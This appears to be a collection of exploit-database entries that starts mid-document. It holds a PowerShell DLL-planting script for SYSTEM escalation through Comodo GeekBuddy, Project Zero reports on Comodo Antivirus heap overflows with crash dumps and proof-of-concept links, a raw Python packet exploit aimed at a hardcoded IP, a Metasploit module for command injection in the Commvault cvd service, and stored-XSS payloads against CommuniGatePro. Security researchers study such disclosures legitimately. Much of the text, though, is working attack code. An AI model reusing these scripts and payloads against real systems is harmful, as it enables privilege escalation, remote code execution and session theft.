in the C:\Program Files (x86)\Common Files\COMODO\ folder. This service is auto launched by the
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM
level privielges. This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe
to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.
During client connections to update servers and Geek Buddy executions the unit.exe binary will
launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe. This setup binary has
hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is
executed from.
.data:00409240 dd offset aShfolder ; "SHFOLDER"
.data:00409244 dd offset aShgetfolderpat ; "SHGetFolderPathA"
During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before
looking in the other PATHS variables.
By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an
update or client connection to secure servers (which occurs automatically at user login) a user can
elevate their privileges to SYSTEM and compromise the system fully.
######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times. C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do. #Ninja
Sizzop - for fixing my greetz
#########################################################################################################
#>
Param
(
[Parameter(ValueFromPipelineByPropertyName = $true)]
[string]$DLL = ""
)
if (!(Test-Path $DLL))
{
throw "Fatal Error: The specified file: $DLL does not exist."
}
Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info"
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
$objNotifyIcon.Visible = $True
$objNotifyIcon.ShowBalloonTip(8000)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=764
Packman is an obscure opensource executable packer that Comodo Antivirus attempts to unpack during scanning. The code is available online here:
http://packmanpacker.sourceforge.net/
If the compression method is set to algorithm 1, compression parameters are read directly from the input executable without validation. Fuzzing this unpacker revealed a variety of crashes due to this, such as causing pointer arithmetic in CAEPACKManUnpack::DoUnpack_With_NormalPack to move pksDeCodeBuffer.ptr to an arbitrary address, which allows an attacker to free() an arbitrary pointer.
This issue is obviously exploitable to execute code as NT AUTHORITY\SYSTEM.
The attached testcase will attempt to free() an invalid pointer to demonstrate this.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39601.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=763
The LZMA specification says the following about the memory usage of decompression:
"The size of the probability model counter arrays is calculated with the following formula: size_of_prob_arrays = 1846 + 768 * (1 << (lp + lc))"
But that formula only holds true if you keep the parameters within the specified range, which the SDK gives as:
lp - The number of literal pos bits (low bits of current position for literals).
It can be in the range from 0 to 4. The default value is 0.
lc - The number of literal context bits (high bits of previous literal).
It can be in the range from 0 to 8. The default value is 3.
If you set the parameters outside those ranges, then the rest of the assumptions don't hold and memory corruption can occur. Comodo do not attempt to keep these parameters in range, and lots of memory corruption can occur, the attached testcase should crash during an LZMA decode operation by overflowing a heap buffer.
This vulnerability is obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM.
(438.dd4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
unpack!CreateInstance+0x654bc:
000007fe`f29890cc 66f3ab rep stos word ptr [rdi]
0:010> r
rax=0000000000000400 rbx=0000000000000000 rcx=000000007ffffe88
rdx=0000000000000001 rsi=000000000b154588 rdi=000000000bbfc000
rip=000007fef29890cc rsp=000000000d6cd2c0 rbp=0000000000000000
r8=0000000000023c7c r9=000000000d6cd378 r10=0000000000000001
r11=000000000b361000 r12=0000000000000001 r13=000000000b39c38c
r14=0000000000000000 r15=000000000bbfaea4
iopl=0 nv up ei ng nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
unpack!CreateInstance+0x654bc:
000007fe`f29890cc 66f3ab rep stos word ptr [rdi]
This is trying to initialize the probabilities array, but overflowing the heap buffer allocated and running off a page boundary.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39602.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=762
In COleMemFile::LoadDiFatList, values from the header are used to parse the document FAT. If header.csectDif is very high, the calculation overflows and a very small buffer is allocated.
The document FAT is then memcpy'd onto the buffer directly from the input file being scanned, resulting in a nice clean heap overflow.
This vulnerability is obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM, the attached test cases should reproduce the problem reliably (this issue was found using trivial fuzzing). You can see this testcase has this->m_oleDocHeader.csectDif = 0x40000001, and so this->m_oleDocHeader.csectDif * this->diFATPerSect * 4 + 436 wraps to 0x3b0.
(b80.ad8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
script!CreateInstance+0x178ac:
00000000`0ac5a4bc 8901 mov dword ptr [rcx],eax ds:00000000`0c79a1f0=????????
0:009> u
script!CreateInstance+0x178ac:
00000000`0ac5a4bc 8901 mov dword ptr [rcx],eax
00000000`0ac5a4be 4d8bc8 mov r9,r8
00000000`0ac5a4c1 49c1e905 shr r9,5
00000000`0ac5a4c5 7550 jne script!CreateInstance+0x17907 (00000000`0ac5a517)
00000000`0ac5a4c7 4d8bc8 mov r9,r8
00000000`0ac5a4ca 49c1e903 shr r9,3
00000000`0ac5a4ce 7414 je script!CreateInstance+0x178d4 (00000000`0ac5a4e4)
00000000`0ac5a4d0 4883e908 sub rcx,8
0:009> r
rax=00000000004e8400 rbx=000000000c782120 rcx=000000000c79a1f0
rdx=fffffffffffe99f8 rsi=000000000c7839f0 rdi=0000000000000017
rip=000000000ac5a4bc rsp=000000000d80e4b8 rbp=0000000000000bd6
r8=00000000000001f8 r9=0000000000000000 r10=00000006ffffffff
r11=000000000c799ff8 r12=00000000000138a1 r13=000000000aea0000
r14=0000000000000000 r15=0000000000336b00
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
script!CreateInstance+0x178ac:
00000000`0ac5a4bc 8901 mov dword ptr [rcx],eax ds:00000000`0c79a1f0=????????
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39603.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=738
A major component of Comodo Antivirus is the x86 emulator, which includes a number of shims for win32 API routines so that common API calls work in emulated programs (CreateFile, LoadLibrary, etc). The emulator itself is located in MACH32.DLL, which is compiled without /DYNAMICBASE, and runs as NT AUTHORITY\SYSTEM.
These API routines access memory from the emulated virtual machine, perform the requested operation, and then poke the result back into the emulator. Because these emulated routines are all native code, they must take care not to trust values extracted from the emulator, which is running attacker controlled code.
Browsing through the list of emulated routines, MSVBVM60!rtcLowerCaseVar jumped out as an obvious case of integer overflow due to trusting attacker-provided parameters.
The code attempts to extract a VT_BSTR VARIANT, which contains a pascal-like string, something like:
struct BSTR {
DWORD Length;
CHAR Data[0];
};
In pseudocode, the code does something like this:
vm->ReadMemory(Parameter1); // PVARIANT
vm->ReadMemory(Parameter2); // PVARIANT
vm->GetData(&LocalVariant, Parameter2); // Read the second VARIANT
if (LocalVariant.vt !== VT_BSTR) // Verify it's a BSTR
return false;
vm->GetData(&szLen, LocalVariant.bstr - 4); // Try to read the Length of the BSTR
The code attempts to convert this BSTR into a nul-terminated wide string. This requires 2 additional bytes (for the terminator), so providing a length of 0xFFFFFFFF will cause the allocation to wrap.
Buf = malloc(szLen + 2); // Allocate space for the string
vm->GetWideString(Buf, Ptr, szLen >> 1); // Read Length/2 WCHARs
This will read Length/2 WCHAR's from the hostile virtual machine and clobber the trusted heap buffer. The corruption can be halted early by placing the BSTR before an unmapped page boundary, resulting in a nice clean heap overflow.
The scan process which runs as NT AUTHORITY\SYSTEM and does not use ASLR, making this a critical remote memory corruption that can be exploited via email, http, etc with zero user interaction.
(e38.2c0): Access violation - code c0000005 (!!! second chance !!!)
00000000`0ec6b5c6 0fb70408 movzx eax,word ptr [rax+rcx] ds:00000000`4e6d1567=????
0:009> r
rax=000000004e6d0002 rbx=0000000000000100 rcx=0000000000001565
rdx=000000005b0ce400 rsi=00000000000000c3 rdi=000000005b0ce510
rip=000000000ec6b5c6 rsp=000000005b0ce3f0 rbp=0000000000006e58
r8=000000005b0ce460 r9=000000004e6d0005 r10=00000000000000e8
r11=00000000000000e8 r12=00000000000000f7 r13=000000004e6bfe1c
r14=0000000000014b08 r15=0000000000000100
iopl=0 nv up ei pl nz ac pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010210
00000000`0ec6b5c6 0fb70408 movzx eax,word ptr [rax+rcx] ds:00000000`4e6d1567=????
0:009> lmv mmach32
start end module name
00000000`17410000 00000000`17658000 mach32 (deferred)
Image path: C:\Program Files\COMODO\COMODO Internet Security\scanners\mach32.dll
Image name: mach32.dll
Timestamp: Mon Dec 29 04:57:44 2014 (54A14FC8)
CheckSum: 00244AF0
ImageSize: 00248000
File version: 6.2.15068.1057
Product version: 6.2.15068.1057
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04e4
CompanyName: COMODO
ProductName: COMODO Antivirus Scan Engine
ProductVersion: 6, 2, 342748, 1057
FileVersion: 6, 2, 342748, 1057
FileDescription: COMODO Antivirus Scan Engine
LegalCopyright: 2005-2014 COMODO. All rights reserved.
I think the same bug exists in rtcSpaceBstr, rtcSpaceVar, rtcUpperCaseBstr, rtcUpperCaseVar, and maybe a few more.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39605.zip
import socket
import binascii
import time
import struct
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect(("10.101.0.85", 8400))
def sr(p=None, r=None):
if p:
print "sending %d bytes: %s " % (len(p)/2,p)
payl = binascii.a2b_hex(p)
s.send(payl)
if r:
data = s.recv(1024*2)
print "received %d bytes: %s " % (len(data),binascii.b2a_hex(data))
pkt1 = "0000003800000010000000100000000f00000000000000000000000000000000000000000000000000000000000000010000000000000000"
pkt1 += "0000100309000101090000000000ffe80000000800010000"
pkt1 += "0000000400000004"
pkt2 = "0000100309000509000000090000ffe800000036"+"00018016"
pkt2 += "02000000"+"09050009"+"c14d4d0"+"000000000000000003a793102076376642e6578656a231a0200429d750500989796059c16e042"+"fd00b417"
pkt3 = "53534c634c6e54"+"01"+"000b"+"77696e323031322d303200"+"03"+"0000000300000001"
p = "41"*0xd0
pkt3 += p
sr(pkt1,1)
sr(pkt2,1)
sr(pkt3,1)
exit()
s.close()
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Commvault Communications Service (cvd) Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability
discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
and v10). The vulnerability exists in the cvd.exe service and allows an
attacker to execute arbitrary commands in the context of the service. By
default, the Commvault Communications service installs and runs as SYSTEM in
Windows and does not require authentication. This vulnerability was discovered
in the Windows version. The Linux version wasn't tested.
},
'License' => MSF_LICENSE,
'Author' =>
[
'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
],
'References' =>
[
['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
{
'Arch' => [ARCH_X64, ARCH_X86]
}
],
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 12 2017'))
register_options([Opt::RPORT(8400)])
end
def exploit
buf = build_exploit
print_status("Connecting to Commvault Communications Service.")
connect
print_status("Executing payload")
#Send the payload
sock.put(buf)
#Handle the shell
handler
disconnect
end
def build_exploit
#Get encoded powershell of payload
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
#Remove additional cmd.exe call
psh = "powershell"
idx = command.index(psh)
command = command[(idx)..-1]
#Build packet
cmd_path = 'C:\Windows\System32\cmd.exe'
msg_type = 9
zero = 0
payload = ""
payload += make_nops(8)
payload += [msg_type].pack('I>')
payload += make_nops(328)
payload += cmd_path
payload += ";"
payload += ' /c "'
payload += command
payload += '" && echo '
payload += "\x00"
payload += [zero].pack('I>')
#Add length header and payload
ret_data = [payload.length].pack('I>')
ret_data += payload
ret_data
end
end
source: https://www.securityfocus.com/bid/49022/info
Community Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Community Server 2007 and 2008 are vulnerable; other versions may also be affected.
http://www.example.com/utility/TagSelector.aspx?TagEditor=[XSS]
# Exploit Title: CommuniGatePro webmails Multiple Stored XSS
# Date: 15/11/2017
# Exploit Author: Boumediene KADDOUR
# Unit: Algerie Telecom R&D Unit
# Vendor Homepage: https://www.stalker.com/
# Software Link: http://www.stalker.com/ (paid product)
# Version: 6.1.16<
# Tested on: production server on crystal, pronto and pronto4 webmails from gmail and hotmail.
CommuniGatePro 6.1.16 webmails (crystal, pronto and pronto4) suffer from multiple stored XSS vulnerabilities. The bellow details illustrate the impact of this vulnerability.
Vulnerability Description:
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Vulnerability details (Stored XSS):
This vulnerability allowed us to gain access to the following:
Control the victim's mailbox by just reading my email
Control the victim's computer in case the person uses Internet Explorer 8 which is widely used in our company.
Send emails on behalf the victim
Deface the whole victim mailbox
Invoke the malicious piece of code each time an attachment's sent to the victim.
Vulnerable sections:
Calendar
Files
Tasks
Notes
Inbox
Attack Narratives and Scenarios:
1. Calendar:
Source webmail: tested with gmail and hotmail
Destination webmail: Crystal
In order to deliver our PoC, we have taken the advantages of google calendar to achieve our goal.
PoC:
POST /calendar/event HTTP/1.1
Host: calendar.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://calendar.google.com/calendar/render?tab=mc
X-If-No-Redirect: 1
X-Is-Xhr-Request: 1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 634
Cookie: Mycookie
Connection: close
sf=true&output=js&action=CREATE&useproto=true&add=boumediene.k%40victim.dz%2Csnbemail%40gmail.com&crm=BUSY&icc=DEFAULT&sprop=goo.allowModify%3Afalse&sprop=goo.allowInvitesOther%3Atrue&sprop=goo.showInvitees%3Atrue&pprop=eventColor%3Anone&eid=762dgnlok9l44rd63im4kisjnd&eref=762dgnlok9l33rd55im4kisjnd&cts=1511425384353&text=%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E&location=Stored%20XSS&details=Stored%20XSS&src=snbemail%40gmail.com&dates=20171123T093000%2F20171123T103000&unbounded=false&gdoc-attachment&scfdata=W1tdXQ..&stz&etz&scp=ONE&nopts=2&nopts=3&nopts=4&hl=en_GB&secid=6VLs1BGsgBB_Tqz6egnXpCYYF24
Once the victim receives the invitation, he/she will not be obliged to click on any link or download any file. The only condition for this PoC to work is a single click to read the email. Once the victim reads the email, the code gets executed on the victim's browser ending up sending sensitive data to the adversary.
2. Files:
Source webmail: pronto/pronto4/Crystal
Destination webmail: Crystal
In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following:
Go to file section.
Create a directory
Name the directory with any JavaScript code, in our case (<img src=X onerror=alert(document.cookie)>)
Share or grant access to victim to be able to at least read the content of the directory
The victim then recieves the email of granting access to that directory
The vitim reads the email and then accesses the directory ending up executing the code within its scope of work
3. Notes:
Source webmail: Crystal
Destination webmail: Crystal
In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following:
Create a note
Put the JavaScript code within it
Share it with the victim
4. Tasks:
Source webmail: pronto/pronto4
Destination webmail: Crystal
In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following:
Create a task
Put the JavaScript code within the task name
publish it
5. Inbox
Source webmail: pronto/pronto4
Destination webmail: Crystal
In order to leverage this vulnerability, a victim must first acquire a local mailbox. What he/she will do is the following:
Create an html file with malicious JavaScript piece of code
Make use of Pronto to send the email to the victim
The victim reads the email using Crystal webmail and the code gets executed.
Remediation:
Sanitize, escape and validate user supplied data accordingly
Vulnerability Disclosure Timeline:
==================================
23 Nov, 17 5:36:09 PM: Vendor Notification
23 Nov, 17 6:56:33 PM: Vendor Response/Feedback
24 Nov, 17 : Vendor released new patched version 6.2.1 and included fixes on version 6.1.19 as a separate Crystal skin package (to be installed as cluster/server-wide custom skin)